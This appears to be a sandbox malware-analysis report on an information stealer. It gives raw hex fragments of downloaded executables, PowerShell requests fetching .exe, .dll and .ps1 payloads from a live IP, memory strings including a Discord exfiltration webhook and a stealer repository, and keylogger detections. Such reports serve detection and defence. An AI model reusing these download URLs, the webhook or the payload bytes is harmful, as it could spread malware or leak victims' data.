Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:12:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:39 GMTETag: "16000-62ab724726645"Accept-Ranges: bytesContent-Length: 90112Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 03 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 4a 01 00 54 00 00 00 24 4b 01 00 28 00 00 00 00 80 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 2c 0f 00 00 b8 3e 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3d 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 13 00 00 00 60 01 00 00 0a 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 80 01 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2c 0f 00 00 00 90 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:13:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 10:33:38 GMTETag: "8a00-62ab6b1fe4fe2"Accept-Ranges: bytesContent-Length: 35328Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 21 00 00 60 7d 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 3a 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 8e 69 8d 15 00 00 01 0b 16 0c 16 0d 2b 17 07 09 02 09 91 06 08 91 61 d2 9c 08 17 58 06 8e 69 5d 0c 09 17 58 0d 09 02 8e 69 32 e3 07 2a 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 11 00 00 0a 03 28 01 00 00 06 0a 28 0f 00 00 0a 06 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 3e 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 60 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 8a 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1b 00 00 0a 72 ac 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 04 00 00 06 2a 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 6a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:13:03 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 09:39:17 GMTETag: "2fdc00-62ab5ef921a41"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 80 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1

Source: global traffic	HTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 157.20.182.177 157.20.182.177

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: FCNUniversityPublicCorporationOsakaJP FCNUniversityPublicCorporationOsakaJP

Source: global traffic	HTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: powershell.exe, 00000000.00000002.1691330350.000001D318462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44
Source: powershell.exe, 00000000.00000002.1691330350.000001D318669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691330350.000001D318963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004A9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1724491354.0000000004E72000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722443705.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722129612.0000000004E82000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722303868.0000000004E82000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722414106.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, envi5f4j.dll.7.dr, envi5f4j.0.cs.6.dr	String found in binary or memory: http://147.45.44.131/infopage/ersyb.exe
Source: csc.exe, 00000007.00000003.1723079852.0000000006B01000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/ersyb.exe0
Source: powershell.exe, 00000000.00000002.1691330350.000001D318462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691330350.000001D318669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/file.exe
Source: powershell.exe, 00000006.00000002.1750613559.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp, iviewers.dll.0.dr	String found in binary or memory: http://147.45.44.131/infopage/iubn.ps1
Source: powershell.exe, 00000000.00000002.1691330350.000001D318462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691330350.000001D318963000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/iviewers.dll
Source: powershell.exe, 00000006.00000002.1753216083.00000000049DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/rwvg1.exe
Source: powershell.exe, 00000006.00000002.1753216083.0000000004A9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.448
Source: powershell.exe, 00000006.00000002.1753216083.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.4486O
Source: RegAsm.exe, 0000000B.00000002.4116633186.0000000001098000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 0000000B.00000002.4116633186.0000000001098000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.11.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000000.00000002.1713822398.000001D326EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713822398.000001D326FE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1691330350.000001D316E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: powershell.exe, 00000000.00000002.1691330350.000001D316E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1753216083.0000000004791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1691330350.000001D317A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1713822398.000001D326EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713822398.000001D326FE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Keylogger Generic

